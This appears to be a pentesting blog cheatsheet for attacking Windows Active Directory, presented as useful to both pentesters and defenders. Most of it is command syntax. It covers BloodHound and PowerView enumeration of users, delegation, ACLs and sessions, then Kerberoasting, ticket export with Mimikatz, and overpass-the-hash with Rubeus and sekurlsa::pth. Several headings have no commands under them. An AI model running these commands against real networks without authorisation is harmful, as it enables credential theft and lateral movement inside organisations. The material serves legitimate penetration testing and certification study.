Table of contents

Active Directory (AD) Cheatsheet

This post assumes that opsec is not required and you can be as noisy as may be required to perform the enumeration and lateral movement. This post is meant for pentesters as well as defenders for the same reason - understand the AD environment better.

This cheatsheet would help some certifications like CRTP, OSCP, PNPT, and such.

Note: Only a subset of flags and switches, which are most commonly used, are shared. Best documentation is the code itself.

This is a living document. Last updated: 19 / June / 2022


Initial and lateral movement enumeration

Get the Dog Out - SharpHound + BloodHound

Let’s have the dog sniff things out because automated enumeration is cool

The tools used are - BloodHound, SharpHound.exe or SharpHound.ps1

Leverage secure LDAP

./SharpHound.exe --SecureLdap

Getting all the data

./SharpHound.exe --CollectionMethod All

It’s best to pull session info separately
Gathering data in a loop (default 2hrs), makes sense for sessions as they change

./SharpHound.exe --CollectionMethod Session [--Loop] [--LoopDuration <HH:MM:SS>] [--LoopInterval <HH:MM:SS>]

Run in a different context

./SharpHound.exe --CollectionMethod All --LdapUsername <user_name> --LdapPassword <pass>

Specify domain

./SharpHound.exe -d this.domain.local --CollectionMethod All

Next step would be to take this data and then feed it to BloodHound GUI to finally have some fun :)

Getting Hands Dirty - PowerView

Let’s have some fun ourselves with manual enumeration.

We will use PowerView and some net commands to perform enumeration manually.

Assuming that latest PowerView script (master and dev are the same) has been loaded in memory.

Domain Enumeration

Get basic information of the domain


Get domain SID


Get domain policies

Get-DomainPolicy [-Domain <target>]

Get domain Kerberos policy


Get list of DCs

Get-DomainController [-Domain <target>]


nslookup <target_dc>

Forest Enumeration

Get current forest


Get a list of domains

Get-ForestDomain [-Forest <target>]

User Enumeration

Get a list of users

Get-NetUser [-Domain <target>] [user_name]
net user /domain

Get a count of users


Get a list of users with some specific properties

Get-NetUser [-Properties <>] 

Get a list of users with their logon counts, bad password attempts where attempts are greater than 0

Get-NetUser | select cn, logoncounts, badpwdcount | ? {$_.badpwdcount -gt 0}

Finding users with SPN

Get-NetUser -SPN

Finding users who are AllowedToDelegateTo

Get-NetUser -TrustedToAuth

Finding users who can be delegated

Get-NetUser -AllowDelegation

Computer Enumeration

Get a list of computers

Get-NetComputer [-Domain <target>] [-OperatingSystem "*2016*"] [-Properties <>]

Get a list of computers with Unconstrained delegation

Get-NetComputer -Unconstrained

Finding users who are AllowedToDelegateTo

Get-NetComputer -TrustedToAuth

Group Enumeration

Get a list of groups in a domain

net group /domain

Get a list of groups in a domain

Get-NetGroup [-Domain <target>] [-FullData] [-GroupName "*admin*"] [-Username 'user_name']

Get group membership

Get-NetGroupMember [-GroupName 'group_name'] [-Recurse]

Share Enumeration

List shares user have access to

Invoke-ShareFinder -CheckShareAccess -ErrorAction SilentlyContinue [-ComputerDomain <target_domain>]

ACL Enumeration

Get resolved ACEs, optionally for a specific user/group and domain

Get-ObjectAcl [-Identity <user_name>] [-Domain <target_domain>] -ResolveGUIDs

Get interesting resolved ACLs

Invoke-ACLScanner [-Domain <target_domain>] -ResolveGUIDS

Get interesting resolved ACLs owned by specific object (ex. noobsec)

Invoke-ACLScanner -ResolveGUIDS \| ?{$_.IdentityReference -match 'noobsec'}

Session Enumeration

Finding sessions on a computer

Get-NetSession [-Computer <comp_name>]

Get who is logged on locally where

Get-LoggedOnLocal [-ComputerName <comp_name>]

User Hunting

Get list of machines where current user has local admin access

Find-LocalAdminAccess [-Domain <target_domain>]

Find machines where members of specific groups have sessions. Default: Domain Admins

Invoke-UserHunter [-GroupName <group_name>]

Find machines where current user has local admin access AND specific group sessions are present

Invoke-UserHunter -CheckAccess

Lateral Movement


To see existing tickets


Remove all tickets

klist purge


Request a kerberos service ticket for specified SPN.
By default output in Hashcat format

Request-SPNTicket -SPN "CIFS/target.domain.local" [-OutputFormat JTR]


By doing it manually, ticket is generated, it requires to be extracted to crack the hash

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "CIFS/target.domain.local"

Dump the tickets out

Invoke-Mimikatz -Command '"kerberos::list /export"'

Now, crack ’em

Over-Pass the Hash


Rubeus.exe asktgt /user:USER < /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/opsec] /ptt


sekurlsa::pth /user:Administrator /domain:target.domain.local < /ntlm:hash | /aes256:hash> /run:powershell.exe
comments powered by Disqus